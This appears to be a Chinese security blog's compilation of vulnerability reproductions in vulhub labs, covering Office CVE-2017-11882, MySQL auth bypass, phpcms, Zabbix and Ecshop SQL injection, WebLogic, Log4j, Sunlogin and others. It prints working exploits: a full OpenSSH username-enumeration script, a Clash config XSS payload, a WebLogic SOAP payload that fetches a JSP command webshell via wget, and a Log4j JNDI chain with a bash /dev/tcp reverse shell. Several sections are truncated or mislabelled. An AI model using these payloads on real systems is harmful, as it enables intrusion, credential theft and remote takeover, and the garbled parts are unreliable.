Office漏洞

漏洞简介

CVE-2017-11882属于缓冲区溢出类型漏洞，产生漏洞原因于EQNEDT32.EXE（微软office自带公式编辑器）进程在读入包含MathType的ole数据时，在拷贝公式字体名称（Font Name数据）时没有对名称长度进行校验，导致缓冲区溢出。通过覆盖函数的返回地址，可执行任意代码。

2017年11月14日，微软发布了11月份的安全补丁更新，影响流行的所有Office版本

事件属性名	作用
漏洞ID	CVE-2017-11882
漏洞名称	Microsoft Office数学公式编辑器内存损坏漏洞
漏洞类型	远程代码执行
威胁类型	栈溢出
影响版本	Microsoft Office 2000/2003/2007sp3/2010sp2/2013sp1/2016

环境介绍

攻击：kali IP：192.168.31.14
受害者：windows7 IP：192.168.31.55 Microsoft Office2016版本
漏洞文件生成https://github.com/Ridter/CVE-2017-11882

EXP

下载地址https://github.com/Ridter/CVE-2017-11882
命令

1	git clone https://github.com/Ridter/CVE-2017-11882

生成漏洞文件

进入目录cd CVE-2017-11882
下面生成的文件受害者就会执行是计算器

1	python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

执行命令启动计算器

可以看见生成了一个test.doc的文件

在目标windows7打开就启动计算器

EXP 生成

hta 是 HTML 应用程序，大多数的 Windows 操作系统都支持 hta 文件执行，利用 mshta.exe 解析 .hta文件执行，这里的 .hta 文件可以是本地的也可以是可访问的远程主机上的

模块：use exploit/windows/misc/hta_server
木马模块：set payload windows/meterpreter/reverse_tcp

应为他默认就是用的windows/meterpreter/reverse_tcp模块

指定web地址：set SRVHOST kali的IP
指定web端口：set SRVPORT 指定的端口
指定地址：set RHOST kali的IP
指定监听端口：set LPORT 监听端口
运行：exploit -j #-j是隐藏连接的意思
运行结果
可以看见地址是http://192.168.31.14:8090/bblVmviVL2gVIES.hta

EXP 生成
下面地址就添加上面打开的web地址

1	python Command109b_CVE-2017-11882.py -c "mshta http://192.168.31.14:8090/bblVmviVL2gVIES.hta" -o test.doc

他会生成一个test.doc

拿到win7系统打开test.doc一个shell就得到了

查看shell的id

1	sessions -l

进入shell

1	sessions -i 1

进入shell后就可以你想操作的了

参考地址

国光
 https://www.freebuf.com/articles/web/183551.html

MetInfo4.0任意用户密码修改漏洞

参数环境

服务器windows2003，服务器软件phpstudy2018, MetInfo4.0版本
攻击者kal linux

实验环境搭建

MetInfo4.0版本下载地址https://www.metinfo.cn/upload/file/update/MetInfo4.0.zip
phpstudy2018现在地址http://public.xp.cn/upgrades/PhpStudy2018.zip

叫下载好的MetInfo4.0版本解压出来

访问这个地址http://ip/MetInfo/

这样就安装好了

漏洞

我们先注册一个会员

进行注册

我们登录一下

我们进行修改密码

用Burp抓包
可以看见这个是我们要修改的用户名

我们改成管理员的admin用户

可以看见修改成功

我们进入管理员页面

abc用设置的abc的密码登录
发现登录进入了

Weblogic SSRF漏洞

参数环境

SSRF就是，
一个web功能是通过本服务器来访问其他的web，比如web服务提供访问其他网页或照片的功能
黑客就可以通过你提供的web访问其他网页的功能进行内网探测和端口扫描等操作

实验环境搭建

Vulhub是一个面向大众的开源漏洞靶场，无需docker知识，简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像

下面是他的安装

安装pip

kali可以直接用下面这个命令进行下载

1	apt install python3-pip

如果是其他的其他可以用下面进行下载和安装
下载官方:https://pypi.org/project/pip/#files
运行下面这个命令进行下载

1	curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py

安装

1	python3 get-pip.py

安装compose

用pip进行下载上面已经说这么安装pip了
下载命令

1	pip3 install docker-compose

或者用这个下载也可以

1	apt install docker-compose

下载vulhub

命令

1	git clone https://github.com/vulhub/vulhub.git

应为下载慢我就用了科学上网下载的比较快

安装docker

kali安装运行下面这个命令就可以直接安装

1	apt install docker.io

如果是其他的linux可以用下面这个命令安装

1	curl -s https://get.docker.com/ \| sh

启动docker和测试

启动命令

1	systemctl start docker

测试命令

1	docker run hello-world

输出这个说明就可以用了

启动环境

进入目录可以看见有很多的测试的环境

下面我就启动weblogic/ssrf/靶场
进入目录

1	cd weblogic/ssrf/

文件内容

启动命令

1	docker-compose up -d

运行完之后他就去下载镜像和，启动容器了

可以启动查看ssrf靶场

命令

docker ps

可以看见已经确定成功了

访问网页

1	http://kali的ip:7001

开始

漏洞存在地址

1	http://kali的ip:7001/uddiexplorer/SearchPublicRegistries.jsp

Clash Rce漏洞

影响范围

Windows v0.19.9版以下

POC

port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror=eval(`require("child_process").exec("notepad.exe");`);>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true

proxy-groups:
  -
    name: <img/src="1"/onerror=eval(`require("child_process").exec("notepad.exe");`);>
    type: select
    proxies:
    - a<img/src="1"/onerror=eval(`require("child_process").exec("notepad.exe");`);>

导入Clash配置文件里面

CVE-2012-2122Mysql身份认证漏洞及利用

影响范围

漏洞介绍

当连接MariaDB/MySQL时，输入的密码会与期望的正确密码比较，由于不正确的处理，会导致即便是memcmp()返回一个非零值，也会使MySQL认为两个密码是相同的。按照公告说法大约256次就能够蒙对一次

受影响版本：

MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not

靶场

进入/vulhub/phpmyadmin/CVE-2018-12613

1	docker-compose up -d

1
2
3

zss@zss > ~/漏洞/vulhub/mysql/CVE-2012-2122>>> sudo docker-compose up -d           
[sudo] zss 的密码：        
Starting cve-2012-2122_mysql_1 ... done

漏洞验证

启动msfconsole

msf6 > use  auxiliary/scanner/mysql/mysql_authbypass_hashdump 
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set RHOSTS 60.2.185.218
RHOSTS => 60.2.185.218
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set THREADS 10  # 设置线程
THREADS => 10  
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run 
[+] 192.168.0.106:3306    - 192.168.0.106:3306 The server allows logins, proceeding with bypass test
[*] 192.168.0.106:3306    - 192.168.0.106:3306 Authentication bypass is 10% complete
[*] 192.168.0.106:3306    - 192.168.0.106:3306 Authentication bypass is 20% complete
[*] 192.168.0.106:3306    - 192.168.0.106:3306 Authentication bypass is 30% complete
[*] 192.168.0.106:3306    - 192.168.0.106:3306 Authentication bypass is 40% complete
[+] 192.168.0.106:3306    - 192.168.0.106:3306 Successfully bypassed authentication after 411 attempts. URI: mysql://root:Egvoq@192.168.0.106:3306
[+] 192.168.0.106:3306    - 192.168.0.106:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
[+] 192.168.0.106:3306    - 192.168.0.106:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.0.106:3306    - 192.168.0.106:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.0.106:3306    - 192.168.0.106:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.0.106:3306    - 192.168.0.106:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.0.106:3306    - 192.168.0.106:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.0.106:3306    - 192.168.0.106:3306 Hash Table has been saved: /home/zss/.msf4/loot/20211230110548_default_192.168.0.106_mysql.hashes_615289.txt
[*] 192.168.0.106:3306    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

https://www.cmd5.com/

DedeCMS-V5.7SP2后台代码执行漏洞

环境搭建

安装什么很简单就设置一个数据库密码就不多说了
我用的服务器是phpstudy
下载地址xp.cn
DedeCMS-V5.7SP2官方下载地址http://dedecms.com/products/dedecms/downloads/
我在官方下载的出来的保存在蓝奏云地址https://wwa.lanzous.com/i8zW7h12t9i

漏洞

登录后台在/dede/文件里面
默认用户admin密码是admin

登录成功

在访问这个地址

1	访问域名 + /dede/tpl.php?action=upload

查看一下token源代码

写入恶意脚本

1 2	访问域名 + /dede/tpl.php?filename=secquan.lib.php&action=savetagfile&content=<?php%20phpinfo();?>&token=

phpcms_v9.6.0_sql注入漏洞

环境搭建

漏洞

访问/index.php?m=wap&c=index&a=init&siteid=1获取cookie

在发送一个POST请求

头http://192.168.0.103/phpcms_v9.6.0_UTF8/install_package/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28user%28%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26构建一个sql报错注入的语句

解码后面http://192.168.0.103/phpcms_v9.6.0_UTF8/install_package/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=&id=%*27 and updatexml(1,concat(1,(user())),1)#&m=1&f=haha&modelid=2&catid=7&

POST内容

1	userid_flash=d698WOQsXmCwdTCLSW5CN_aEUeQVAPcFAqSq7-nZ #上面请求的cookie值

得到第二个cookie

然后构建一个get请求

xxxinit&a_k=后面这个就是上面的cookie值

http://192.168.0.103/phpcms_v9.6.0_UTF8/install_package/index.php?m=content&c=down&a=init&a_k=8068qLWSDNB6ODqmqllaIwav_Hh7JQ3UAYGM81uI6D28x1Ubvkq6I-eT-9x9_uEFnGlxXOKJd7pfkV5XRYm7SEviSS0157Bxmo7GZ1Kgen31-u1grBBNY680KOFbTHOP4SV8k0Fl_UAjbLEpwUXPM7tQYy5DWyJCpGnGwhuL_WnKLP42si9b9gwSJ8KA5j88xoqH-iZauCig-7fB_CanZkS7dNxiV2s82RbisYiOLn-TFFH--2JwuF_aIjV0T69gWyxRhwV6Co8IJRQd91bpHGzs6uArES6h1y95Y-W6pmpECSE8FSdSy2K0SaCN6Kga8ouCsLq7M1tTw-K59Y_ranYXcaF1N_tvsmDAd7LNxreK3OCoCm_yM8h1BQ4XLIuFgnY8Y4PtiOoOhbihN707k3CQm9ivw1Apwrd3KGrbMC3Euu7f1LjmVErIUdzga8dypNR3zap5NlU4mUoUVpzpKNwnmZercDH_OeqIutAMqvxy3QKiNorKpCR2vA

OpenSSH 漏洞用户名枚举漏洞(CVE-2018-15473)

OpenSSH 7.7前存在一个用户名枚举漏洞，通过该漏洞，攻击者可以判断某个用户名是否存在于目标主机中。

参考链接：
· http://openwall.com/lists/oss-security/2018/08/15/5
· https://github.com/Rhynorater/CVE-2018-15473-Exploit
· https://www.anquanke.com/post/id/157607

靶场metasploitable-linux-2.0.0

依赖的paramiko下载

1	pip3 install "paramiko == 2.0.8"

直接下载
https://github.com/Rhynorater/CVE-2018-15473-Exploit

或者复制下面的代码
下面的代码保存为sshUsernameEnumExploit.py

#!/usr/bin/env python
###########################################################################
#                ____                    _____ _____ _    _               #
#               / __ \                  / ____/ ____| |  | |              #
#              | |  | |_ __   ___ _ __ | (___| (___ | |__| |              #
#              | |  | | '_ \ / _ \ '_ \ \___ \\___ \|  __  |              #
#              | |__| | |_) |  __/ | | |____) |___) | |  | |              #
#               \____/| .__/ \___|_| |_|_____/_____/|_|  |_|              #
#                     | |               Username Enumeration              #
#                     |_|                                                 #
#                                                                         #
###########################################################################
# Exploit: OpenSSH Username Enumeration Exploit (CVE-2018-15473)          #
# Vulnerability: CVE-2018-15473                                           #
# Affected Versions: OpenSSH version < 7.7                                #
# Author: Justin Gardner, Penetration Tester @ SynerComm AssureIT         #
# Github: https://github.com/Rhynorater/CVE-2018-15473-Exploit            #
# Email: Justin.Gardner@SynerComm.com                                     #
# Date: August 20, 2018                                                   #
###########################################################################

import argparse
import logging
import paramiko
import multiprocessing
import socket
import string
import sys
import json
from random import randint as rand
from random import choice as choice
# store function we will overwrite to malform the packet
old_parse_service_accept = paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT]

# list to store 3 random usernames (all ascii_lowercase characters); this extra step is added to check the target
# with these 3 random usernames (there is an almost 0 possibility that they can be real ones)
random_username_list = []
# populate the list
for i in range(3):
    user = "".join(choice(string.ascii_lowercase) for x in range(rand(15, 20)))
    random_username_list.append(user)

# create custom exception
class BadUsername(Exception):
    def __init__(self):
        pass

# create malicious "add_boolean" function to malform packet
def add_boolean(*args, **kwargs):
    pass

# create function to call when username was invalid
def call_error(*args, **kwargs):
    raise BadUsername()

# create the malicious function to overwrite MSG_SERVICE_ACCEPT handler
def malform_packet(*args, **kwargs):
    old_add_boolean = paramiko.message.Message.add_boolean
    paramiko.message.Message.add_boolean = add_boolean
    result  = old_parse_service_accept(*args, **kwargs)
    #return old add_boolean function so start_client will work again
    paramiko.message.Message.add_boolean = old_add_boolean
    return result

# create function to perform authentication with malformed packet and desired username
def checkUsername(username, tried=0):
    sock = socket.socket()
    sock.connect((args.hostname, args.port))
    # instantiate transport
    transport = paramiko.transport.Transport(sock)
    try:
        transport.start_client()
    except paramiko.ssh_exception.SSHException:
        # server was likely flooded, retry up to 3 times
        transport.close()
        if tried < 4:
            tried += 1
            return checkUsername(username, tried)
        else:
            print('[-] Failed to negotiate SSH transport')
    try:
        transport.auth_publickey(username, paramiko.RSAKey.generate(1024))
    except BadUsername:
            return (username, False)
    except paramiko.ssh_exception.AuthenticationException:
            return (username, True)
    #Successful auth(?)
    raise Exception("There was an error. Is this the correct version of OpenSSH?")

# function to test target system using the randomly generated usernames
def checkVulnerable():
    vulnerable = True
    for user in random_username_list:
        result = checkUsername(user)
        if result[1]:
            vulnerable = False
    return vulnerable

def exportJSON(results):
    data = {"Valid":[], "Invalid":[]}
    for result in results:
        if result[1] and result[0] not in data['Valid']:
            data['Valid'].append(result[0])
        elif not result[1] and result[0] not in data['Invalid']:
            data['Invalid'].append(result[0])
    return json.dumps(data)

def exportCSV(results):
    final = "Username, Valid\n"
    for result in results:
        final += result[0]+", "+str(result[1])+"\n"
    return final

def exportList(results):
    final = ""
    for result in results:
        if result[1]:
            final+=result[0]+" is a valid user!\n"
        else:
            final+=result[0]+" is not a valid user!\n"
    return final

# assign functions to respective handlers
paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = malform_packet
paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = call_error

# get rid of paramiko logging
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())

arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('hostname', type=str, help="The target hostname or ip address")
arg_parser.add_argument('--port', type=int, default=22, help="The target port")
arg_parser.add_argument('--threads', type=int, default=5, help="The number of threads to be used")
arg_parser.add_argument('--outputFile', type=str, help="The output file location")
arg_parser.add_argument('--outputFormat', choices=['list', 'json', 'csv'], default='list', type=str, help="The output file location")
group = arg_parser.add_mutually_exclusive_group(required=True)
group.add_argument('--username', type=str, help="The single username to validate")
group.add_argument('--userList', type=str, help="The list of usernames (one per line) to enumerate through")
args = arg_parser.parse_args()

def main():
    sock = socket.socket()
    try:
        sock.connect((args.hostname, args.port))
        sock.close()
    except socket.error:
        print('[-] Connecting to host failed. Please check the specified host and port.')
        sys.exit(1)

    # first we run the function to check if host is vulnerable to this CVE
    if not checkVulnerable():
        # most probably the target host is either patched or running a version not affected by this CVE
        print("Target host most probably is not vulnerable or already patched, exiting...")
        sys.exit(0)
    elif args.username: #single username passed in
        result = checkUsername(args.username)
        if result[1]:
            print(result[0]+" is a valid user!")
        else:
            print(result[0]+" is not a valid user!")
    elif args.userList: #username list passed in
        try:
            f = open(args.userList)
        except IOError:
            print("[-] File doesn't exist or is unreadable.")
            sys.exit(3)
        usernames = map(str.strip, f.readlines())
        f.close()
        # map usernames to their respective threads
        pool = multiprocessing.Pool(args.threads)
        results = pool.map(checkUsername, usernames)
        try:
            if args.outputFile:
                outputFile = open(args.outputFile, "w")
        except IOError:
            print("[-] Cannot write to outputFile.")
            sys.exit(5)
        if args.outputFormat=='json':
            if args.outputFile:
                outputFile.writelines(exportJSON(results))
                outputFile.close()
                print("[+] Results successfully written to " + args.outputFile + " in JSON form.")
            else:
                print(exportJSON(results))
        elif args.outputFormat=='csv':
            if args.outputFile:
                outputFile.writelines(exportCSV(results))
                outputFile.close()
                print("[+] Results successfully written to " + args.outputFile + " in CSV form.")
            else:
                print(exportCSV(results))
        else:
            if args.outputFile:
                outputFile.writelines(exportList(results))
                outputFile.close()
                print("[+] Results successfully written to " + args.outputFile + " in List form.")
            else:
                print(exportList(results))
    else: # no usernames passed in
        print("[-] No usernames provided to check")
        sys.exit(4)

if __name__ == '__main__':
    main()

命令

1	python3 sshUsernameEnumExploit.py --port 指定的端口 --userList 指定的字典文件目标ip

可以看到已经枚举出来了

大米cms5.4业务逻辑漏洞

测试环境

服务器，win2003，大米cms5.4
攻击者windows10

环境搭建

叫文件解压出来

访问http://ip/dami
出现下面这个选择同意

看看有没有错的

数据库名默认是root

这样就安装成功了

漏洞

我们先注册一个用户

我们登录上去

我们购买商品

他显示余额不足

我们用Burp抓一下包

我们解码一下

这个应该就是数量

我们把他改成-1放包

发现他购买成功

还增加了现金

Zabbix sql注入漏洞（CVE-2016-10134）

zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数，保证服务器系统的安全运营；并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。

zabbix由2部分构成，zabbix server与可选组件zabbix agent。zabbix server可以通过SNMP，zabbix agent，ping，端口监视等方法提供对远程服务器/网络状态的监视，数据收集等功能，它可以运行在Linux，Solaris，HP-UX，AIX，Free BSD，Open BSD，OS X等平台上。

漏洞版本

zabbix 2.2.x, 3.0.0-3.0.3

环境搭建

1 2	cd vulhub/zabbix/CVE-2016-10134 sudo docker-compose up -d

漏洞

漏洞存在的位置

1	/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)

读取数据库名称

1	/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=extractvalue(1,(select%20group_concat(schema_name)%20from%20information_schema.schemata))

sqlmap跑

1	sqlmap -u "http://43.138.105.228:8081/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1"

向日葵命令执行漏洞（CNVD-2022-10270）

测试环境

向日葵个人版for Windows：https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270

影响版本

向日葵个人版for Windows <= 11.0.0.33

向日葵简约版 <= V1.0.1.43315 (2021.12)

环境

环境我用的是10.3.0.27372版本下载地址：https://wwi.lanzouy.com/irKi301jjype

检测与利用工具：https://github.com/Mr-xn/sunlogin_rce/releases/tag/new

解压赠予执行权限

漏洞

工具使用说明

 zss@zss>>> ./xrkRce


╔═╗┬ ┬┌┐┌╦  ┌─┐┌─┐┬┌┐┌   ╦═╗┌─┐┌─┐
╚═╗│ ││││║  │ ││ ┬││││───╠╦╝│  ├┤ 
╚═╝└─┘┘└┘╩═╝└─┘└─┘┴┘└┘   ╩╚═└─┘└─┘

                                                by:T00ls.net
                                                向日葵Rce
----------------------------------------------

Usage of ./xrkRce:
  -c string   //要执行的命令
        cmd 
  -h string   //目标ip
        ip
  -p string	   //指定扫描端口默认40000-65535
        port:40000-65535 (default "40000-65535")
  -t string		//执行模式默认扫描模式(scan)  代码执行模式(rce)
        type (default "scan")
  -x int 	//指定线程默认1000
        x (default 1000)

目标扫描

1	./xrkRce -h 192.168.0.107 -t scan

代码执行

1	./xrkRce -h 192.168.0.107 -t rce -p 49180 -c "ipconfig"

Tomcat7+ 弱口令 && 后台getshell漏洞

启动vulhub靶场

# 切换到vulhub目录
cd vulhub/tomcat/tomcat8
# 开启镜像
docker-compose up -d

进入http://127.0.0.1:8080

用户tomcat密码tomcat

webshell文件压缩

然后把压缩后的文件改成.war

然后叫压缩的文件上传

然后访问这个地址：http://127.0.0.1:8080/shell/shell.jsp

Shiro RCE 550

Weblogic 反序列化远程代码执行漏洞（CVE-2019-2725）

漏洞简介

2019年10月16日，WebLogic官方发布了安全补丁公告，修复了包含CVE-2019-2890等高危漏洞。Weblogic在利用T3协议进行远程资源加载调用时，默认会进行黑名单过滤以保证反序列化安全。漏洞CVE-2019-2890绕过了Weblogic的反序列化黑名单，使攻击者可以通过T3协议对存在漏洞的Weblogic组件实施远程攻击，但该漏洞利用条件较高，官方也归类为需要身份认证。

漏洞原理

在利用T3协议进行远程资源加载调用时，默认会进行黑名单过滤以保证反序列化安全。本漏洞绕过了Weblogic的反序列化黑名单，使攻击者可以通过T3协议对存在漏洞的Weblogic组件实施远程攻击。由于T3协议在Weblogic控制台开启的情况下默认开启，而Weblogic默认安装会自动开启控制台，所以攻击者可通过此漏洞造成远程代码执行，以控制Weblogic服务器

影响版本

WebLogic Server 10.3.6.0

WebLogic Server 12.1.3.0

WebLogic Server 12.2.1.3

环境搭建

进入

1	cd vulhub/weblogic/CVE-2017-10271/

启动

1	sudo docker-compose up -d

访问http://ip:7001/console/login/LoginForm.jsp

搭建一个web服务xxxx.txt文件内容

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[1024];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

漏洞存在的位置http://ip:7001/_async/AsyncResponseService

构建burp请求

下面ip地址改成上面我们创建的web的xxx.txt地址

下面代码写入的文件是1.jsp

POST /_async/AsyncResponseService HTTP/1.1
Host: wp.zssnp.top:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 855
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: /
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
content-type: text/xml
 

<soapenv:Envelope 
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://ip/xxx.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/1.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

返回202说明写入成功

然后访问1.jsp

http://xxxx:7001/_async/1.jsp?pwd=123&cmd=id

Weblogic任意文件上传漏洞（CVE-2018-2894）

漏洞概述

Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞，进而获取服务器权限。

Oracle 7月更新中，修复了Weblogic Web Service Test Page中一处任意文件上传漏洞，Web Service Test Page 在 ‘生产模式’ 下默认不开启，所以该漏洞有一定限制。两个页面分别为/ws_utc/begin.do、/ws_utc/config.do。

受影响的版本

weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2、weblogic 12.2.1.3。

环境搭建

进入vulhub/weblogic/CVE-2018-2894

启动

1	sudo docker-compose up -d

查看用户名密码

1	docker-compose logs \| grep password

环境启动之后，访问http://xxxx:7001/console输入用户名密码登录进去

然后访问http://xxxx:7001/ws_utc/config.do

设置Work Home Dir为/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css填写好后然后提交

然后搜索password找到时间时间戳

然后在访问http://xxx:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]

连接

log4j漏洞CVE-2021-44228

环境搭建

1 2	sudo docker pull vulfocus/log4j2-rce-2021-12-09:latest sudo docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09

漏洞验证

打开

会跳转到下面的地址

使用dnslog

${jndi:ldap://smfd8.dnslog.zssnp.top}进行URL编码

存在漏洞

反向shell

这边使用JNDI注入工具下载地址为https://github.com/bkfish/Apache-Log4j-Learning/tree/main

用nc监听端口

1	nc -lvvp 9999

格式：

1	java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "要执行命令" -A "要访问连接的IP"

使用下面命令进行反向shell

1	bash -i >& /dev/tcp/反向连接的ip/反向连接的端口 0>&1

然后进行编码操作

地址https://ares-x.com/tools/runtime-exec/

1	bash -c {echo,YmFzaCAtaSAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx+JjE=}\|{base64,-d}\|{bash,-i}

上面命令生成好后然后在服务器上运行

1	java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx+JjE=}\|{base64,-d}\|{bash,-i}" -A "服务器IP"

运行

可以看见生成了好几个运行的版本

这个版本应该是要有的目标有漏洞的服务用的扫描版本使用对应的版本才行

我们直接复制上面的下面那个

构建成

1	${jndi:rmi://43.xxx.xx.xx:1099/vm9adu}

然后在url编码

提交

看一下服务器成功连接

Struts2 漏洞

S2-001 （CVE-2007-4556）

ThinkPHP5.X SQL注入漏洞和敏感信息泄露漏洞

我是啊锋，一个努力的学渣，作为一个刚进入安全大门的小白，我希望能把自己所学到的东西总结出来，分享到博客上，可以一起进步，一起交流，一起学习。
前文：
名字雷同但差个n的两种类型漏洞环境靶机：vulnhub与vulhub的区别

Vulhub漏洞之Dns域传送漏洞

Vulhub漏洞之Django (小于2.0.8)任意url跳转漏洞（CVE-2018-14574）

漏洞影响：
<5.0.9
该漏洞形成最关键的一点是需要开启debug模式

漏洞：
vulhub目录cd vulhub/phpmyadmin/CVE-2018-12613#
对靶场进行编译：docker-compose build
运行靶场：docker-compose up -d

启动后，访问http://your-ip/index.php?ids[]=1&ids[]=2，即可看到用户名被显示了出
来，说明环境运行成功打开页面，插入sql报错注入语句
http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1，您将发现成功显示的消息：

值得一提的是这种数据库账户和密码泄漏的前提是SQL语句执行失败或者发生异常的时候才会出现。如果非SQL语法错误的debug模式下是不会泄漏数据库账户和密码的。

Ecshop Sql注入

xianzhi-2017-02-82239600
启动靶场
在终端里进入事先进入准备好的vulhub靶场目录下，

cd vulhub-master/ecshop/xianzhi-2017-02-82239600
sudo docker-compose up -d
1
2
执行命令后

Ecshop2.x:
可在浏览器中输入http://ip:8080，正常访问即为靶场启动成功。

Ecshop3.x:
可在浏览器中输入http://ip:8081，正常访问即为靶场启动成功。

然后分别进行安装即可，数据库地址为mysql，用户名密码均为root

漏洞发现
漏洞成因
Referer值未做任何验证可被控制直接引用
采用_echash做分割，且为定值：2.x：554fcae493e564ee0dc75bdf2ebf94ca、3.x：45ea207d7a2b68c49582d2d22adf953a
insert_ads函数的sql拼接不规范导致sql注入
make_val函数拼接字符串，拼接用户输入内容。
经由以上四个步骤即可造成远程代码执行，具体分析可参考文章

漏洞利用
手搓
知道原理后我们就开始利用漏洞了，环境如下：

靶机：192.168.75.146

攻击机：192.168.75.144

首先需要准备准备POC，代码如下：

sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell), "id" => $id ]; $s = serialize($arr); $hash3 = '45ea207d7a2b68c49582d2d22adf953a'; $hash2 = '554fcae493e564ee0dc75bdf2ebf94ca'; echo "POC for ECShop 2.x: \n"; echo "{$hash2}ads|{$s}{$hash2}"; echo "\n\nPOC for ECShop 3.x: \n"; echo "{$hash3}ads|{$s}{$hash3}"; ?>

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
使用php执行上述代码，生成POC：

POC for ECShop 2.x:
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:”num”;s:107:”/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10– -“;s:2:”id”;s:11:”-1’ UNION/“;}554fcae493e564ee0dc75bdf2ebf94ca

POC for ECShop 3.x:
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:”num”;s:107:”/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10– -“;s:2:”id”;s:11:”-1’ UNION/“;}45ea207d7a2b68c49582d2d22adf953a
1
2
3
4
5
Ecshop2.x POC利用：
在burp中抓包Ecshop用户登录页面，发送到重放器Repeater里，然后将请求信息替换成下方的POC：

GET /user.php HTTP/1.1
Host: [目标IP]
Referer: [生成的POC]
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 1
1
2
3
4
5
6
7
发送后即可得到如下结果，证明漏洞利用成功。

Ecshop3.x POC利用：
在burp中抓包Ecshop用户登录页面，发送到重放器Repeater里，然后将请求信息替换成下方的POC：

Get WebShell
生成获取WebShell的POC，代码如下：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
// 原型

file_put_contents(‘eval.php’,‘’)

// base64编码

